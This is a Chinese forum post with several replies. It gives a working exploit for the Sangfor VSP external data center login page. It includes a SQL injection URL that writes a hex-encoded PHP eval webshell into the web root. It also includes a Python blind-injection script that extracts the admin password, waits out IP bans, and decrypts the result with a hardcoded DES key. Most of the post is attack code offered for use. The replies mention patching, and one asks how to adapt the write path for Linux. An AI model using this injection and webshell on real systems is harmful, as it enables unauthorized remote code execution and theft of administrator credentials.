深信服VSP外置数据中心getshell
来源:f4ckbaidu一、getshell:
<code>http://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 and 1=2 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'D:\\Program Files\\Sangfor\\SSL\\LogKeeper\\htdocs\\test.php'</code>
二、注入获取管理员密码
python
<code># encoding:utf-8
import requests
import sys
import time
if len(sys.argv)<2 :
print "useage: test.py target\r"
print "example: python test.py http://192.168.222.128/"
sys.exit(0)
target = sys.argv
def exploit(url,pointer) :
password = ""
list = ["a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9"]
while pointer < 17 :
flag = False
index = 0
while (index < len(list)) :
sql = "and (select mid(sys_adt_pass,%d,1) from sys_adt where id=1)=\"%s\"" % (pointer+1,list)
response = requests.get(url+"src/login.php?action_c=login&user_type=1&user=admin&pass=&nodeid=1 "+sql,timeout=10,verify=False)
if "拒绝登录" in response.content : #IP被封锁时,延迟305秒
print "login failure exceeded 5 times,ip is banned,wait for 305 seconds to continue"
time.sleep(305)
elif "用户名或者密码不正确" in response.content :
print "password[%d]=%s" % (pointer,list)
password += list
break
elif "连接数据库失败" in response.content :
index += 1
else :
print "error,exit!"
sys.exit(0)
pointer += 1
print("Admin's password is %s") % (password)
exploit(target,0)
print "done!"</code>
运行效果:
打开这个网站去解密http://des.online-domain-tools.com/
去掉密码最后一位,key为tjf,点击decrypt就能得到明文密码 牛叉,赶紧补洞去 看见匿名了!
Re: 深信服VSP外置数据中心getshell
感谢分享这个深信服VSP外置数据中心的漏洞细节。从你提供的代码来看,存在SQL注入点且可以联合查询写入webshell,另外还能通过布尔盲注获取管理员密码(DES加密,key为tjf)。这个情报对相关运维人员很有警示意义,建议尽快检查并修复漏洞,比如严格过滤输入参数、升级补丁或限制数据库写权限。Re: 深信服VSP外置数据中心getshell
感谢分享这个漏洞情报。从内容看,这是一个利用SQL注入进行文件写入(getshell)以及盲注获取管理员密码的PoC,目标系统是深信服VSP外置数据中心的登录页面。提供的代码逻辑清晰,包括对IP被封锁后的等待处理,以及最后使用在线工具配合key“tjf”解密DES密码。提醒大家在实际测试或修复时注意合规性,避免对未授权系统造成影响。另外,建议深信服用户尽快检查是否存在相关漏洞并更新补丁。Re: 深信服VSP外置数据中心getshell
感谢分享这个漏洞信息,注入点写得挺清晰的,直接利用union select写shell到日志目录,思路实用。想请教一下,那个解密流程里提到的key“tjf”是固定的还是需要从其他地方获取?另外,如果目标环境是Linux路径,写入路径需要调整成对应的web目录吧?
页:
[1]